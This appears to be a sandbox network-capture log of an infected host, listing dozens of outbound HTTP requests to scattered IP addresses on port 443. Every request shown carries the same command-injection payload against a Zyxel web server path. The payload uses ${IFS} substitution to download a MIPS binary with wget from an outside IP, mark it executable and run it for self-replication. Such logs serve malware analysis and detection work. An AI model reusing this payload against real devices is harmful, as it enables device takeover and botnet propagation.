                                                Jan 12, 2024 18:24:50.206758022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8128192.168.2.135682417.255.113.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206793070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8129192.168.2.134813080.18.233.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206829071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8130192.168.2.1357000151.3.22.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206912041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8131192.168.2.1336732204.189.243.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.206969976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8132192.168.2.134189660.229.121.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207040071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8133192.168.2.134689483.90.189.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207061052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8134192.168.2.135257231.146.10.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207128048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8135192.168.2.1353634110.170.66.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207166910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8136192.168.2.1355744163.101.11.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207231998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8137192.168.2.135069440.114.2.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207288980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8138192.168.2.135891832.255.189.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207353115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8139192.168.2.1357048171.2.92.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207396984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8140192.168.2.134078686.37.152.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207463980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8141192.168.2.133682835.57.240.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207525015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8142192.168.2.1345954193.91.144.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207547903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8143192.168.2.1344460221.136.52.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207609892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8144192.168.2.134817636.229.181.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207664013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8145192.168.2.1360686181.117.240.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207720041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8146192.168.2.1336622169.102.1.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207770109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8147192.168.2.1355896143.72.19.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207807064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8148192.168.2.1337842201.87.94.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207875967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8149192.168.2.1349878169.194.96.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207909107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8150192.168.2.134147237.61.237.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.207979918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8151192.168.2.134114684.180.173.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208015919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8152192.168.2.1346410116.231.159.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208117962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8153192.168.2.133594875.207.238.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208143950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8154192.168.2.1346476217.23.155.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208213091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8155192.168.2.134197443.50.128.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208261967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8156192.168.2.135730267.123.115.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208302021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8157192.168.2.1348788211.104.91.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208353996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8158192.168.2.1352022165.65.170.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208416939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8159192.168.2.1348072180.1.223.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208456993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8160192.168.2.1340880102.181.108.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208540916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8161192.168.2.134646235.0.5.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208570957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8162192.168.2.1348450152.145.220.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208627939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8163192.168.2.133664671.249.6.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208695889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8164192.168.2.1349436104.76.117.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208745003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8165192.168.2.1333250146.100.227.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208810091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8166192.168.2.1342224185.98.33.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208877087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8167192.168.2.1341716156.117.164.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208925962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8168192.168.2.1334262213.232.84.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.208991051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8169192.168.2.1353174136.103.57.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209041119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8170192.168.2.13378328.88.65.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209095001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8171192.168.2.1347780139.103.179.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209167957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8172192.168.2.1353222164.15.230.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209223986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8173192.168.2.133560671.135.145.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209268093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8174192.168.2.1356600199.43.241.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209341049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8175192.168.2.135906217.113.105.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209388971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8176192.168.2.1333204142.201.162.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209435940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8177192.168.2.1342754147.173.198.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209496975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8178192.168.2.1349062203.131.70.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209634066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8179192.168.2.135459476.122.144.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209667921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8180192.168.2.133855470.250.168.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209722042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8181192.168.2.1349230125.241.94.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209790945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8182192.168.2.134476058.41.215.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209815025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8183192.168.2.135152663.76.156.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209871054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8184192.168.2.134010850.129.230.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209929943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8185192.168.2.135242659.108.72.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.209968090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8186192.168.2.135885448.0.234.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210036039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8187192.168.2.134876847.197.227.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210067987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8188192.168.2.134467688.184.88.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210129976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8189192.168.2.134089882.195.97.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210179090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8190192.168.2.1354154204.87.52.249443
                                                TimestampBytes transferredDirectionData
